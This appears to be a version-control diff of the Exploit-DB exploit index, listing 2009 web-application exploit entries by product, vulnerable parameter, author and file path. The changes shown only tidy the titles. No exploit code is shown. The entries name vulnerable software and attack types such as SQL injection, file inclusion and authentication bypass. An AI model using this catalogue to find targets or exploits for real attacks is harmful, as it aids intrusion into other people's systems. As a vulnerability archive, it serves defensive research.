 9122,platforms/php/webapps/9122.txt,"Opial 1.0 - Arbitrary File Upload / Cross-Site Scripting / SQL Injection",2009-07-11,LMaster,php,webapps,0
 9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injections",2009-07-11,MizoZ,php,webapps,0
 9126,platforms/php/webapps/9126.txt,"Joomla!
Component com_category - 'catid' SQL Injection",2009-07-11,Prince_Pwn3r,php,webapps,0
 9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps,0
-9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0
+9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting",2009-07-12,Vrs-hCk,php,webapps,0
 9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0
 9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
@@ -21303,7 +21306,7 @@ id,file,description,date,author,platform,type,port
 9182,platforms/php/webapps/9182.txt,"AJOX Poll - 'managepoll.php' Authentication Bypass",2009-07-17,SirGod,php,webapps,0
 9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 - Authentication Bypass / SQL Injection / HTML Injection",2009-07-17,$qL_DoCt0r,php,webapps,0
 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - SITE_fiche.php SQL Injection",2009-07-17,DeCo017,php,webapps,0
-9185,platforms/php/webapps/9185.txt,"good/bad vote - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0
+9185,platforms/php/webapps/9185.txt,"good/bad vote - Cross-Site Scripting / Local File Inclusion",2009-07-17,Moudi,php,webapps,0
 9187,platforms/php/webapps/9187.txt,"Joomla! Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0
 9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - (news.php n) SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps,0
 9194,platforms/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0
@@ -21312,7 +21315,7 @@ id,file,description,date,author,platform,type,port
 9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - (silentum_Guestbook.php) SQL Injection",2009-07-20,Bgh7,php,webapps,0
 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass",2009-07-20,Mr.tro0oqy,php,webapps,0
 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 - 'lang' Remote File Inclusion",2009-07-20,NoGe,php,webapps,0
-9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL Injection / Cross-Site Scripting / shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
+9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell",2009-07-20,SirGod,php,webapps,0
 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0
 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0
 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0
@@ -21325,7 +21328,7 @@ id,file,description,date,author,platform,type,port
 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Authentication Bypass",2009-07-23,SwEET-DeViL,php,webapps,0
 9238,platforms/php/webapps/9238.txt,"Joomla! Component com_Joomlaoads - (packageId) SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0
 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0
-9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
+9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0
 9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
@@ -21338,12 +21341,12 @@ id,file,description,date,author,platform,type,port
 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0
 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0
 9258,platforms/php/webapps/9258.txt,"Joomla! Component Almond Classifieds com_aclassf 7.5 - Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
-9259,platforms/php/webapps/9259.txt,"almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
-9260,platforms/php/webapps/9260.txt,"skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
-9261,platforms/php/webapps/9261.txt,"XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
-9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
+9259,platforms/php/webapps/9259.txt,"almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+9260,platforms/php/webapps/9260.txt,"skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+9261,platforms/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
+9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0
 9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0
-9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0
+9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - Local File Inclusion / SQL Injection",2009-07-27,SirGod,php,webapps,0
 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - 'Cat_ID' SQL Injection",2009-07-27,octopos,php,webapps,0
 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script - 'home.php' Remote File Inclusion",2009-07-27,int_main();,php,webapps,0
 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection",2009-07-27,MizoZ,php,webapps,0
@@ -21369,10 +21372,10 @@ id,file,description,date,author,platform,type,port
 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion",2009-07-28,NoGe,php,webapps,0
 9307,platforms/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 - readfile() Local File Disclosure",2009-07-30,GoLd_M,php,webapps,0
 9308,platforms/php/webapps/9308.txt,"justVisual 1.2 - (fs_jVroot) Remote File Inclusion",2009-07-30,SirGod,php,webapps,0
-9309,platforms/php/webapps/9309.txt,"Orbis CMS 1.0 - (File Delete/Download File / Arbitrary File Upload / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0
+9309,platforms/php/webapps/9309.txt,"Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection",2009-07-30,SirGod,php,webapps,0
 9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion",2009-07-30,SirGod,php,webapps,0
-9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0
-9312,platforms/php/webapps/9312.txt,"d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0
+9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,php,webapps,0
+9312,platforms/php/webapps/9312.txt,"d.net CMS - Local File Inclusion / SQL Injection",2009-07-30,SirGod,php,webapps,0
 9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Parameter Local File Inclusion",2009-07-30,SirGod,php,webapps,0
 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0
 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0
@@ -21382,7 +21385,7 @@ id,file,description,date,author,platform,type,port
 9324,platforms/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0
 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0
 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0
-9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-08-01,SwEET-DeViL,php,webapps,0
+9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0
 9328,platforms/asp/webapps/9328.txt,"AW BannerAd - (Authentication Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0
 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0
 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - (Authentication Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0
@@ -21395,7 +21398,7 @@ id,file,description,date,author,platform,type,port
 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0
-9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0
+9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0
 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0
 9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
 9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
@@ -21404,18 +21407,18 @@ id,file,description,date,author,platform,type,port
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0
 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0
 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0
-9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-04,PLATEN,php,webapps,0
+9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0
 9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0
-9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - (File Download / Remote File Inclusion) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0
-9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 - (File Disclosure / Remote Code Execution) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0
+9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0
+9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 - File Disclosure / Remote Code Execution",2009-08-05,SirGod,php,webapps,0
 9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 - SQL Injection",2009-08-05,Ins3t,php,webapps,0
-9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-05,Moudi,php,webapps,0
-9371,platforms/php/webapps/9371.txt,"opennews 1.0 - (SQL Injection / Remote Code Execution) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0
+9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting",2009-08-05,Moudi,php,webapps,0
+9371,platforms/php/webapps/9371.txt,"opennews 1.0 - SQL Injection / Remote Code Execution",2009-08-05,SirGod,php,webapps,0
 9372,platforms/php/webapps/9372.txt,"Portel 2008 - 'decide.php patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0
-9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
+9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting",2009-08-06,int_main();,php,webapps,0
 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
-9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - (SQL Injection / File Inclusion) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
+9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0
 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0
 9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0
@@ -21427,7 +21430,7 @@ id,file,description,date,author,platform,type,port
 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0
 9398,platforms/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0
 9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0
-9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - (File Disclosure / Insecure Cookie Handling) Multiple Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0
+9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0
 9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0
 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0
 9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0
@@ -21443,7 +21446,7 @@ id,file,description,date,author,platform,type,port
 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0
 9431,platforms/php/webapps/9431.txt,"WordPress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0
 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Arbitrary File Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
-9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
+9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure",2009-08-13,[]ViZiOn,php,webapps,0
 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 - (comment) Remote Code Injection",2009-08-14,"Khashayar Fereidani",php,webapps,0
 9438,platforms/php/webapps/9438.txt,"PHP Competition System 0.84 - (competition) SQL Injection",2009-08-14,Mr.SQL,php,webapps,0
 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0
@@ -21452,7 +21455,7 @@ id,file,description,date,author,platform,type,port
 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0
 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0
 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
-9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0
+9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
@@ -21489,7 +21492,7 @@ id,file,description,date,author,platform,type,port
 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0
 9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusion",2009-08-26,cr4wl3r,php,webapps,0
 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0
-9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
+9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion",2009-08-26,Moudi,php,webapps,0
 9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0
 9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' Parameter SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0
 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0
@@ -21534,7 +21537,7 @@ id,file,description,date,author,platform,type,port
 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0
 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0
-9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0
+9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting",2009-09-10,"Salvatore Fresta",php,webapps,0
 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0
 9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager - 'action' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0
 9631,platforms/php/webapps/9631.txt,"iDesk - 'download.php cat_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0
@@ -21545,9 +21548,9 @@ id,file,description,date,author,platform,type,port
 9636,platforms/php/webapps/9636.txt,"An image Gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0
 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection",2009-09-10,"Salvatore Fresta",php,webapps,0
 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - (index.php show) SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0
-9640,platforms/php/webapps/9640.txt,"gyro 5.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
+9640,platforms/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,php,webapps,0
 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0
-9648,platforms/php/webapps/9648.txt,"Joomla! Component Hotel Booking System - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-09-11,K-159,php,webapps,0
+9648,platforms/php/webapps/9648.txt,"Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection",2009-09-11,K-159,php,webapps,0
 9653,platforms/php/webapps/9653.txt,"Joomla! Component Turtushout 0.11 - (Name) SQL Injection",2009-09-14,jdc,php,webapps,0
 9654,platforms/php/webapps/9654.php,"Joomla! Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps,0
 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0
@@ -21561,7 +21564,7 @@ id,file,description,date,author,platform,type,port
 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Authentication Bypass) SQL Injection",2009-09-16,snakespc,php,webapps,0
 9697,platforms/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
 9698,platforms/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
-9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-09-16,"learn3r hacker",php,webapps,0
+9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",php,webapps,0
 9700,platforms/php/webapps/9700.rb,"SaphpLesson 4.3 - Blind SQL Injection",2009-09-16,"Jafer Al Zidjali",php,webapps,0
 9702,platforms/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - (platform) SQL Injection",2009-09-16,snakespc,php,webapps,0
 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0
@@ -21854,7 +21857,7 @@ id,file,description,date,author,platform,type,port
 10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm CMS 1.0 - (PageId) SQL Injection",2009-12-15,Red-D3v1L,asp,webapps,0
 10456,platforms/asp/webapps/10456.txt,"ClickTrackerASP - 'sitedetails.asp siteid' SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0
 10457,platforms/asp/webapps/10457.txt,"LinkPal 1.0 - SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0
-10458,platforms/php/webapps/10458.txt,"Ez Blog 1.0 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0
+10458,platforms/php/webapps/10458.txt,"Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2009-12-15,"Milos Zivanovic",php,webapps,0
 10461,platforms/php/webapps/10461.txt,"Ez Cart 1.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic",php,webapps,0
 10462,platforms/php/webapps/10462.txt,"DubSite CMS 1.0 - Cross-Site Request Forgery",2009-12-15,Connection,php,webapps,0
 10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - Cross-Site Request Forgery",2009-12-15,Nex,php,webapps,0
@@ -21862,7 +21865,7 @@ id,file,description,date,author,platform,type,port
 10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Authentication Bypass) SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0
 10467,platforms/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0
 10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection",2009-12-16,Red-D3v1L,asp,webapps,0
-10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - (Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0
+10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
 10473,platforms/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10474,platforms/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
 10476,platforms/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
@@ -21881,7 +21884,7 @@ id,file,description,date,author,platform,type,port
 10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0
 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
-10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic",php,webapps,0
+10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
 10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player.asp player_id' SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
@@ -21897,9 +21900,9 @@ id,file,description,date,author,platform,type,port
 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0
